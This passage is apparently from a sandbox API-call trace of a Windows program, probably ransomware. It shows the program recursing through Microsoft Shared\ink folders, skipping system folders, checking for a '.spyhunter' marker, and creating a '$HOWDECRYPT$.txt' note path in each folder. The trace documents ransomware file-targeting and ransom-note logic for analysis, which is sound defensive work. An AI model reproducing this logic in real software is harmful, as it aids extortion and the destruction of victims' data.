pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\.") returned 78 [0086.877] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.877] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.877] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.877] lstrlenW (lpString="Windows") returned 7 [0086.877] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.877] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.877] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.877] lstrlenW (lpString="System Volume Information") returned 25 [0086.877] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\..") returned 79 [0086.877] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.877] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.877] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.877] lstrcmpiW (lpString1="oskmenubase.xml", lpString2="Windows") returned -1 [0086.877] lstrlenW (lpString="Windows") returned 7 [0086.877] lstrcmpiW (lpString1="oskmenubase.xml", lpString2="$Recycle.bin") returned 1 [0086.877] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.877] lstrcmpiW (lpString1="oskmenubase.xml", lpString2="System Volume Information") returned -1 [0086.877] lstrlenW (lpString="System Volume Information") returned 25 [0086.877] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 92 [0086.877] StrStrIW (lpFirst="oskmenubase.xml", lpSrch=".spyhunter") returned 0x0 [0086.877] lstrcmpW (lpString1="oskmenubase.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.877] lstrcmpW (lpString1="oskmenubase.xml", lpString2="_uninstalling_.png") returned 1 [0086.877] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 92 [0086.877] GetProcessHeap () returned 0x2c0000 [0086.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfa) returned 0x384058 [0086.878] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x8d8) returned 0x3867e8 [0086.878] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0086.878] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0086.878] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\$HOWDECRYPT$.txt") returned 93 [0086.878] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu\\$HOWDECRYPT$.txt") returned 93 [0086.878] GetProcessHeap () returned 0x2c0000 [0086.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfc) returned 0x370aa0 [0086.878] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x8e0) returned 0x3867e8 [0086.878] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.878] lstrcmpiW (lpString1="oskmenu.xml", lpString2="Windows") returned -1 [0086.878] lstrlenW (lpString="Windows") returned 7 [0086.878] lstrcmpiW (lpString1="oskmenu.xml", lpString2="$Recycle.bin") returned 1 [0086.878] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.878] lstrcmpiW (lpString1="oskmenu.xml", lpString2="System Volume Information") returned -1 [0086.878] lstrlenW (lpString="System Volume Information") returned 25 [0086.878] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml") returned 80 [0086.878] StrStrIW (lpFirst="oskmenu.xml", lpSrch=".spyhunter") returned 0x0 [0086.878] lstrcmpW (lpString1="oskmenu.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.878] lstrcmpW (lpString1="oskmenu.xml", lpString2="_uninstalling_.png") returned 1 [0086.878] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml") returned 80 [0086.878] GetProcessHeap () returned 0x2c0000 [0086.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x328af8 [0086.878] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x8e8) returned 0x3867e8 [0086.878] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.878] lstrcmpiW (lpString1="osknumpad", lpString2="Windows") returned -1 [0086.878] lstrlenW (lpString="Windows") returned 7 [0086.878] lstrcmpiW (lpString1="osknumpad", lpString2="$Recycle.bin") returned 1 [0086.878] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.878] lstrcmpiW (lpString1="osknumpad", lpString2="System Volume Information") returned -1 [0086.878] lstrlenW (lpString="System Volume Information") returned 25 [0086.878] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad") returned 78 [0086.879] lstrcmpW (lpString1="osknumpad", lpString2=".") returned 1 [0086.879] lstrcmpW (lpString1="osknumpad", lpString2="..") returned 1 [0086.879] GetProcessHeap () returned 0x2c0000 [0086.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x373808 [0086.879] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\*") returned 80 [0086.879] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0086.879] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.879] lstrlenW (lpString="Windows") returned 7 [0086.879] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.879] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.879] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.879] lstrlenW (lpString="System Volume Information") returned 25 [0086.879] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\.") returned 80 [0086.879] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.879] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.879] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.879] lstrlenW (lpString="Windows") returned 7 [0086.879] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.879] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.879] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.879] lstrlenW (lpString="System Volume Information") returned 25 [0086.879] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\..") returned 81 [0086.879] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.879] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.879] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.879] lstrcmpiW (lpString1="osknumpadbase.xml", lpString2="Windows") returned -1 [0086.879] lstrlenW (lpString="Windows") returned 7 [0086.879] lstrcmpiW (lpString1="osknumpadbase.xml", lpString2="$Recycle.bin") returned 1 [0086.880] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.880] lstrcmpiW (lpString1="osknumpadbase.xml", lpString2="System Volume Information") returned -1 [0086.880] lstrlenW (lpString="System Volume Information") returned 25 [0086.880] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml") returned 96 [0086.880] StrStrIW (lpFirst="osknumpadbase.xml", lpSrch=".spyhunter") returned 0x0 [0086.880] lstrcmpW (lpString1="osknumpadbase.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.880] lstrcmpW (lpString1="osknumpadbase.xml", lpString2="_uninstalling_.png") returned 1 [0086.880] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml") returned 96 [0086.880] GetProcessHeap () returned 0x2c0000 [0086.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x102) returned 0x370ba8 [0086.880] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x8f0) returned 0x3867e8 [0086.880] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0086.880] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0086.880] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\$HOWDECRYPT$.txt") returned 95 [0086.880] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\$HOWDECRYPT$.txt") returned 95 [0086.880] GetProcessHeap () returned 0x2c0000 [0086.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x100) returned 0x384388 [0086.880] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x8f8) returned 0x3867e8 [0086.880] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.880] lstrcmpiW (lpString1="osknumpad.xml", lpString2="Windows") returned -1 [0086.880] lstrlenW (lpString="Windows") returned 7 [0086.880] lstrcmpiW (lpString1="osknumpad.xml", lpString2="$Recycle.bin") returned 1 [0086.880] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.880] lstrcmpiW (lpString1="osknumpad.xml", lpString2="System Volume Information") returned -1 [0086.880] lstrlenW (lpString="System Volume Information") returned 25 [0086.880] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml") returned 82 [0086.880] StrStrIW (lpFirst="osknumpad.xml", lpSrch=".spyhunter") returned 0x0 [0086.880] lstrcmpW (lpString1="osknumpad.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.881] lstrcmpW (lpString1="osknumpad.xml", lpString2="_uninstalling_.png") returned 1 [0086.881] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml") returned 82 [0086.881] GetProcessHeap () returned 0x2c0000 [0086.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x328fa8 [0086.881] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x900) returned 0x3867e8 [0086.881] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.881] lstrcmpiW (lpString1="oskpred", lpString2="Windows") returned -1 [0086.881] lstrlenW (lpString="Windows") returned 7 [0086.881] lstrcmpiW (lpString1="oskpred", lpString2="$Recycle.bin") returned 1 [0086.881] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.881] lstrcmpiW (lpString1="oskpred", lpString2="System Volume Information") returned -1 [0086.881] lstrlenW (lpString="System Volume Information") returned 25 [0086.881] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred") returned 76 [0086.881] lstrcmpW (lpString1="oskpred", lpString2=".") returned 1 [0086.881] lstrcmpW (lpString1="oskpred", lpString2="..") returned 1 [0086.881] GetProcessHeap () returned 0x2c0000 [0086.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x373808 [0086.881] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\*") returned 78 [0086.881] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0086.881] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.881] lstrlenW (lpString="Windows") returned 7 [0086.881] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.881] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.881] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.881] lstrlenW (lpString="System Volume Information") returned 25 [0086.881] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\.") returned 78 [0086.881] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.882] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.882] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.882] lstrlenW (lpString="Windows") returned 7 [0086.882] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.882] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.882] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.882] lstrlenW (lpString="System Volume Information") returned 25 [0086.882] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\..") returned 79 [0086.882] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.882] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.882] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.882] lstrcmpiW (lpString1="oskpredbase.xml", lpString2="Windows") returned -1 [0086.882] lstrlenW (lpString="Windows") returned 7 [0086.882] lstrcmpiW (lpString1="oskpredbase.xml", lpString2="$Recycle.bin") returned 1 [0086.882] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.882] lstrcmpiW (lpString1="oskpredbase.xml", lpString2="System Volume Information") returned -1 [0086.882] lstrlenW (lpString="System Volume Information") returned 25 [0086.882] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 92 [0086.882] StrStrIW (lpFirst="oskpredbase.xml", lpSrch=".spyhunter") returned 0x0 [0086.882] lstrcmpW (lpString1="oskpredbase.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.882] lstrcmpW (lpString1="oskpredbase.xml", lpString2="_uninstalling_.png") returned 1 [0086.882] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 92 [0086.882] GetProcessHeap () returned 0x2c0000 [0086.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfa) returned 0x384490 [0086.882] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x908) returned 0x3867e8 [0086.882] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0086.882] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0086.882] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\$HOWDECRYPT$.txt") returned 93 [0086.882] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\$HOWDECRYPT$.txt") returned 93 [0086.882] GetProcessHeap () returned 0x2c0000 [0086.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfc) returned 0x384598 [0086.883] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x910) returned 0x3867e8 [0086.883] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.883] lstrcmpiW (lpString1="oskpred.xml", lpString2="Windows") returned -1 [0086.883] lstrlenW (lpString="Windows") returned 7 [0086.883] lstrcmpiW (lpString1="oskpred.xml", lpString2="$Recycle.bin") returned 1 [0086.883] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.883] lstrcmpiW (lpString1="oskpred.xml", lpString2="System Volume Information") returned -1 [0086.883] lstrlenW (lpString="System Volume Information") returned 25 [0086.883] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 80 [0086.883] StrStrIW (lpFirst="oskpred.xml", lpSrch=".spyhunter") returned 0x0 [0086.883] lstrcmpW (lpString1="oskpred.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.883] lstrcmpW (lpString1="oskpred.xml", lpString2="_uninstalling_.png") returned 1 [0086.883] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 80 [0086.883] GetProcessHeap () returned 0x2c0000 [0086.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x329098 [0086.883] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x918) returned 0x3867e8 [0086.883] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.883] lstrcmpiW (lpString1="symbols", lpString2="Windows") returned -1 [0086.883] lstrlenW (lpString="Windows") returned 7 [0086.883] lstrcmpiW (lpString1="symbols", lpString2="$Recycle.bin") returned 1 [0086.883] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.883] lstrcmpiW (lpString1="symbols", lpString2="System Volume Information") returned -1 [0086.883] lstrlenW (lpString="System Volume Information") returned 25 [0086.883] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols") returned 76 [0086.883] lstrcmpW (lpString1="symbols", lpString2=".") returned 1 [0086.883] lstrcmpW (lpString1="symbols", lpString2="..") returned 1 [0086.883] GetProcessHeap () returned 0x2c0000 [0086.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x373808 [0086.883] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\*") returned 78 [0086.883] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0086.884] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.884] lstrlenW (lpString="Windows") returned 7 [0086.884] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.884] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.884] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.884] lstrlenW (lpString="System Volume Information") returned 25 [0086.884] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\.") returned 78 [0086.884] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.884] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.884] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.884] lstrlenW (lpString="Windows") returned 7 [0086.884] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.884] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.884] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.884] lstrlenW (lpString="System Volume Information") returned 25 [0086.884] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\..") returned 79 [0086.884] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.884] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.884] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.884] lstrcmpiW (lpString1="ea-sym.xml", lpString2="Windows") returned -1 [0086.884] lstrlenW (lpString="Windows") returned 7 [0086.884] lstrcmpiW (lpString1="ea-sym.xml", lpString2="$Recycle.bin") returned 1 [0086.884] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.884] lstrcmpiW (lpString1="ea-sym.xml", lpString2="System Volume Information") returned -1 [0086.884] lstrlenW (lpString="System Volume Information") returned 25 [0086.884] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 87 [0086.885] StrStrIW (lpFirst="ea-sym.xml", lpSrch=".spyhunter") returned 0x0 [0086.885] lstrcmpW (lpString1="ea-sym.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.885] lstrcmpW (lpString1="ea-sym.xml", lpString2="_uninstalling_.png") returned 1 [0086.885] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 87 [0086.885] GetProcessHeap () returned 0x2c0000 [0086.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf0) returned 0x354430 [0086.885] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x920) returned 0x3867e8 [0086.885] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.885] lstrcmpiW (lpString1="ja-jp-sym.xml", lpString2="Windows") returned -1 [0086.885] lstrlenW (lpString="Windows") returned 7 [0086.885] lstrcmpiW (lpString1="ja-jp-sym.xml", lpString2="$Recycle.bin") returned 1 [0086.885] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.885] lstrcmpiW (lpString1="ja-jp-sym.xml", lpString2="System Volume Information") returned -1 [0086.885] lstrlenW (lpString="System Volume Information") returned 25 [0086.885] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 90 [0086.885] StrStrIW (lpFirst="ja-jp-sym.xml", lpSrch=".spyhunter") returned 0x0 [0086.885] lstrcmpW (lpString1="ja-jp-sym.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.885] lstrcmpW (lpString1="ja-jp-sym.xml", lpString2="_uninstalling_.png") returned 1 [0086.885] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 90 [0086.885] GetProcessHeap () returned 0x2c0000 [0086.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf6) returned 0x383950 [0086.885] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x928) returned 0x3867e8 [0086.885] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.885] lstrcmpiW (lpString1="symbase.xml", lpString2="Windows") returned -1 [0086.885] lstrlenW (lpString="Windows") returned 7 [0086.885] lstrcmpiW (lpString1="symbase.xml", lpString2="$Recycle.bin") returned 1 [0086.885] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.885] lstrcmpiW (lpString1="symbase.xml", lpString2="System Volume Information") returned -1 [0086.885] lstrlenW (lpString="System Volume Information") returned 25 [0086.886] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml") returned 88 [0086.886] StrStrIW (lpFirst="symbase.xml", lpSrch=".spyhunter") returned 0x0 [0086.886] lstrcmpW (lpString1="symbase.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.886] lstrcmpW (lpString1="symbase.xml", lpString2="_uninstalling_.png") returned 1 [0086.886] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml") returned 88 [0086.886] GetProcessHeap () returned 0x2c0000 [0086.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf2) returned 0x3846a0 [0086.886] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x930) returned 0x3867e8 [0086.886] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0086.886] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0086.886] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\$HOWDECRYPT$.txt") returned 93 [0086.886] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\$HOWDECRYPT$.txt") returned 93 [0086.886] GetProcessHeap () returned 0x2c0000 [0086.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfc) returned 0x353830 [0086.886] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x938) returned 0x3867e8 [0086.886] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.886] lstrcmpiW (lpString1="symbols.xml", lpString2="Windows") returned -1 [0086.886] lstrlenW (lpString="Windows") returned 7 [0086.886] lstrcmpiW (lpString1="symbols.xml", lpString2="$Recycle.bin") returned 1 [0086.886] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.886] lstrcmpiW (lpString1="symbols.xml", lpString2="System Volume Information") returned -1 [0086.886] lstrlenW (lpString="System Volume Information") returned 25 [0086.886] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml") returned 80 [0086.886] StrStrIW (lpFirst="symbols.xml", lpSrch=".spyhunter") returned 0x0 [0086.886] lstrcmpW (lpString1="symbols.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.887] lstrcmpW (lpString1="symbols.xml", lpString2="_uninstalling_.png") returned 1 [0086.887] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml") returned 80 [0086.887] GetProcessHeap () returned 0x2c0000 [0086.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x329188 [0086.887] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, 